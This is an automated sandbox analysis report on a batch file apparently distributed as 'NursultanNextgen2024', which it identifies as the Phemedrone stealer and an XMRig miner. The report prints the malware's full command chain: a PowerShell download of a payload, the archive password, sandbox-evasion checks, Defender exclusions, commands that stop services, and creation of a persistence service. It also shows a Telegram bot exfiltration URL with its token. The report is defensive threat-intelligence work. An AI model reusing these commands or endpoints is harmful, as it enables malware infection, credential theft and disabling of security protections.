phemedrone | bab8b5e74ab7210b030316dd5685f3fdcceac35bd3b3a90e5dd01592f8abb630

Analysis

max time kernel
150s
max time network
118s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
23/06/2024, 13:01 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NursultanNextgen2024/start.bat
Size

100KB
MD5

45ccb4e03696834d0852bb90f65e3629
SHA1

0d67056066728699a323f63510cdadefc9504084
SHA256

7e0903c4f236d2e0e92522ede6284ea24464af4e86c812cce72e897bb2a87754
SHA512

0c30ab9c768d378d29ad4fdc16d3321038dc71040d041deb8604751f950691aef8a2e6c817578db9057ffb0460f3b3b97f44488f884b2fd7b18f0bde9f2d4561
SSDEEP

3072:9AP7YD2E0xfyQZbsRdwNWuiTvEoryDJV9MTtnI3:9A8D2x66sRdwku+T4MTtI3

Score

10^/10

phemedrone xmrig defense_evasion evasion execution miner persistence spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

1
(new-object system.net.webclient).downloadfile("https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download", "C:\\Users\\Admin\\AppData\\Local\\Temp\\Cache.rar")
2

URLs

exe.dropper

https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download

Extracted

Family

phemedrone

https://api.telegram.org/bot7274515778:AAEx4SxiDLjUG8dht4Cac1HVmxqTSwD_yL4/sendDocument

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral32/memory/2188-584-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral32/memory/2188-583-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral32/memory/2188-589-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral32/memory/2188-590-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral32/memory/2188-588-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral32/memory/2188-587-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral32/memory/2188-586-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral32/memory/2188-593-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral32/memory/2188-594-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	4444	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4056	powershell.exe
4932	powershell.exe
4444	powershell.exe
4964	powershell.exe
4944	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	Run64.exe
File created	C:\Windows\system32\drivers\etc\hosts	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 3 IoCs

pid	Process
4440	Java20.exe
3924	Run64.exe
4668	powershell.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral32/memory/2188-578-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-582-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-579-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-584-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-583-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-589-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-590-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-588-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-587-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-586-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-581-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-580-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-593-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral32/memory/2188-594-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	pastebin.com
15	pastebin.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
760	powercfg.exe
1184	powercfg.exe
1924	powercfg.exe
4672	powercfg.exe
3744	powercfg.exe
3040	powercfg.exe
4476	powercfg.exe
1384	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	Run64.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4440 set thread context of 3828	4440	Java20.exe	95
PID 4668 set thread context of 4980	4668	powershell.exe	154
PID 4668 set thread context of 2188	4668	powershell.exe	159

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
4468	powershell.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
876	sc.exe
4468	sc.exe
4464	sc.exe
1384	sc.exe
1864	sc.exe
1440	sc.exe
2112	sc.exe
3056	sc.exe
2096	sc.exe
2028	sc.exe
3312	sc.exe
2492	sc.exe
3312	sc.exe
5024	sc.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
2284	timeout.exe
3396	timeout.exe
3504	timeout.exe

Modifies data under HKEY_USERS 51 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4056	powershell.exe
4056	powershell.exe
4056	powershell.exe
4468	powershell.exe
4468	powershell.exe
4468	powershell.exe
4932	powershell.exe
4932	powershell.exe
4932	powershell.exe
4444	powershell.exe
4444	powershell.exe
4444	powershell.exe
3112	powershell.exe
3112	powershell.exe
3112	powershell.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3828	RegAsm.exe
3924	Run64.exe
4964	powershell.exe
4964	powershell.exe
4964	powershell.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
3924	Run64.exe
4668	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4668	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3596	WMIC.exe
Token: SeSecurityPrivilege	3596	WMIC.exe
Token: SeTakeOwnershipPrivilege	3596	WMIC.exe
Token: SeLoadDriverPrivilege	3596	WMIC.exe
Token: SeSystemProfilePrivilege	3596	WMIC.exe
Token: SeSystemtimePrivilege	3596	WMIC.exe
Token: SeProfSingleProcessPrivilege	3596	WMIC.exe
Token: SeIncBasePriorityPrivilege	3596	WMIC.exe
Token: SeCreatePagefilePrivilege	3596	WMIC.exe
Token: SeBackupPrivilege	3596	WMIC.exe
Token: SeRestorePrivilege	3596	WMIC.exe
Token: SeShutdownPrivilege	3596	WMIC.exe
Token: SeDebugPrivilege	3596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3596	WMIC.exe
Token: SeRemoteShutdownPrivilege	3596	WMIC.exe
Token: SeUndockPrivilege	3596	WMIC.exe
Token: SeManageVolumePrivilege	3596	WMIC.exe
Token: 33	3596	WMIC.exe
Token: 34	3596	WMIC.exe
Token: 35	3596	WMIC.exe
Token: 36	3596	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3596	WMIC.exe
Token: SeSecurityPrivilege	3596	WMIC.exe
Token: SeTakeOwnershipPrivilege	3596	WMIC.exe
Token: SeLoadDriverPrivilege	3596	WMIC.exe
Token: SeSystemProfilePrivilege	3596	WMIC.exe
Token: SeSystemtimePrivilege	3596	WMIC.exe
Token: SeProfSingleProcessPrivilege	3596	WMIC.exe
Token: SeIncBasePriorityPrivilege	3596	WMIC.exe
Token: SeCreatePagefilePrivilege	3596	WMIC.exe
Token: SeBackupPrivilege	3596	WMIC.exe
Token: SeRestorePrivilege	3596	WMIC.exe
Token: SeShutdownPrivilege	3596	WMIC.exe
Token: SeDebugPrivilege	3596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3596	WMIC.exe
Token: SeRemoteShutdownPrivilege	3596	WMIC.exe
Token: SeUndockPrivilege	3596	WMIC.exe
Token: SeManageVolumePrivilege	3596	WMIC.exe
Token: 33	3596	WMIC.exe
Token: 34	3596	WMIC.exe
Token: 35	3596	WMIC.exe
Token: 36	3596	WMIC.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeIncreaseQuotaPrivilege	4468	powershell.exe
Token: SeSecurityPrivilege	4468	powershell.exe
Token: SeTakeOwnershipPrivilege	4468	powershell.exe
Token: SeLoadDriverPrivilege	4468	powershell.exe
Token: SeSystemProfilePrivilege	4468	powershell.exe
Token: SeSystemtimePrivilege	4468	powershell.exe
Token: SeProfSingleProcessPrivilege	4468	powershell.exe
Token: SeIncBasePriorityPrivilege	4468	powershell.exe
Token: SeCreatePagefilePrivilege	4468	powershell.exe
Token: SeBackupPrivilege	4468	powershell.exe
Token: SeRestorePrivilege	4468	powershell.exe
Token: SeShutdownPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeSystemEnvironmentPrivilege	4468	powershell.exe
Token: SeRemoteShutdownPrivilege	4468	powershell.exe
Token: SeUndockPrivilege	4468	powershell.exe
Token: SeManageVolumePrivilege	4468	powershell.exe
Token: 33	4468	powershell.exe
Token: 34	4468	powershell.exe
Token: 35	4468	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1968 wrote to memory of 4676	1968	cmd.exe	74
PID 1968 wrote to memory of 4676	1968	cmd.exe	74
PID 1968 wrote to memory of 4328	1968	cmd.exe	75
PID 1968 wrote to memory of 4328	1968	cmd.exe	75
PID 1968 wrote to memory of 5036	1968	cmd.exe	76
PID 1968 wrote to memory of 5036	1968	cmd.exe	76
PID 1968 wrote to memory of 220	1968	cmd.exe	77
PID 1968 wrote to memory of 220	1968	cmd.exe	77
PID 220 wrote to memory of 3596	220	cmd.exe	78
PID 220 wrote to memory of 3596	220	cmd.exe	78
PID 1968 wrote to memory of 3876	1968	cmd.exe	80
PID 1968 wrote to memory of 3876	1968	cmd.exe	80
PID 1968 wrote to memory of 4056	1968	cmd.exe	81
PID 1968 wrote to memory of 4056	1968	cmd.exe	81
PID 1968 wrote to memory of 2260	1968	cmd.exe	82
PID 1968 wrote to memory of 2260	1968	cmd.exe	82
PID 1968 wrote to memory of 4468	1968	cmd.exe	83
PID 1968 wrote to memory of 4468	1968	cmd.exe	83
PID 1968 wrote to memory of 4932	1968	cmd.exe	84
PID 1968 wrote to memory of 4932	1968	cmd.exe	84
PID 1968 wrote to memory of 3608	1968	cmd.exe	85
PID 1968 wrote to memory of 3608	1968	cmd.exe	85
PID 1968 wrote to memory of 212	1968	cmd.exe	86
PID 1968 wrote to memory of 212	1968	cmd.exe	86
PID 1968 wrote to memory of 2284	1968	cmd.exe	87
PID 1968 wrote to memory of 2284	1968	cmd.exe	87
PID 1968 wrote to memory of 220	1968	cmd.exe	88
PID 1968 wrote to memory of 220	1968	cmd.exe	88
PID 1968 wrote to memory of 4444	1968	cmd.exe	89
PID 1968 wrote to memory of 4444	1968	cmd.exe	89
PID 1968 wrote to memory of 3112	1968	cmd.exe	90
PID 1968 wrote to memory of 3112	1968	cmd.exe	90
PID 1968 wrote to memory of 5012	1968	cmd.exe	91
PID 1968 wrote to memory of 5012	1968	cmd.exe	91
PID 1968 wrote to memory of 4440	1968	cmd.exe	92
PID 1968 wrote to memory of 4440	1968	cmd.exe	92
PID 1968 wrote to memory of 4440	1968	cmd.exe	92
PID 1968 wrote to memory of 3924	1968	cmd.exe	93
PID 1968 wrote to memory of 3924	1968	cmd.exe	93
PID 1968 wrote to memory of 3396	1968	cmd.exe	94
PID 1968 wrote to memory of 3396	1968	cmd.exe	94
PID 4440 wrote to memory of 3828	4440	Java20.exe	95
PID 4440 wrote to memory of 3828	4440	Java20.exe	95
PID 4440 wrote to memory of 3828	4440	Java20.exe	95
PID 4440 wrote to memory of 3828	4440	Java20.exe	95
PID 4440 wrote to memory of 3828	4440	Java20.exe	95
PID 4440 wrote to memory of 3828	4440	Java20.exe	95
PID 4440 wrote to memory of 3828	4440	Java20.exe	95
PID 4440 wrote to memory of 3828	4440	Java20.exe	95
PID 1968 wrote to memory of 5060	1968	cmd.exe	96
PID 1968 wrote to memory of 5060	1968	cmd.exe	96
PID 1968 wrote to memory of 3504	1968	cmd.exe	97
PID 1968 wrote to memory of 3504	1968	cmd.exe	97
PID 2220 wrote to memory of 3108	2220	cmd.exe	134
PID 2220 wrote to memory of 3108	2220	cmd.exe	134
PID 4152 wrote to memory of 4072	4152	cmd.exe	141
PID 4152 wrote to memory of 4072	4152	cmd.exe	141
PID 4668 wrote to memory of 4980	4668	powershell.exe	154
PID 4668 wrote to memory of 4980	4668	powershell.exe	154
PID 4668 wrote to memory of 4980	4668	powershell.exe	154
PID 4668 wrote to memory of 4980	4668	powershell.exe	154
PID 4668 wrote to memory of 4980	4668	powershell.exe	154
PID 4668 wrote to memory of 4980	4668	powershell.exe	154
PID 4668 wrote to memory of 4980	4668	powershell.exe	154

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
  2⤵
  PID:4676
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
  2⤵
  PID:4328
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
  2⤵
  PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:220
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3596
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
  2⤵
  PID:3876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4056
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:2260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4932
- C:\Windows\system32\wscript.exe
  wscript /b
  2⤵
  PID:3608
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:212
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:2284
- C:\Windows\system32\doskey.exe
  doskey /listsize=0
  2⤵
  PID:220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -c "Write-Host -NoNewLine $null"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3112
- C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\rar\UnRAR.exe
  "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
  2⤵
  PID:5012
- C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
  "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4440
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3828
- C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
  "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:3924
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4120
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4464
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3312
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2096
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1384
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:5024
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:3056
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:1184
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:3744
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:4672
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:1924
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WindowsPower"
    3⤵
    - Launches sc.exe
    PID:1864
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WindowsPower" binpath= "C:\ProgramData\windows\powershell.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:876
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1440
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WindowsPower"
    3⤵
    - Launches sc.exe
    PID:2492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2220
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:3108
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:3396
- C:\Windows\system32\doskey.exe
  doskey ASSOC=ENDLOCAL
  2⤵
  PID:5060
- C:\Windows\system32\timeout.exe
  timeout /T 10 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:3504
- C:\Windows\system32\doskey.exe
  doskey /listsize=0
  2⤵
  PID:1740

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:3444

C:\ProgramData\windows\powershell.exe
C:\ProgramData\windows\powershell.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4668
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
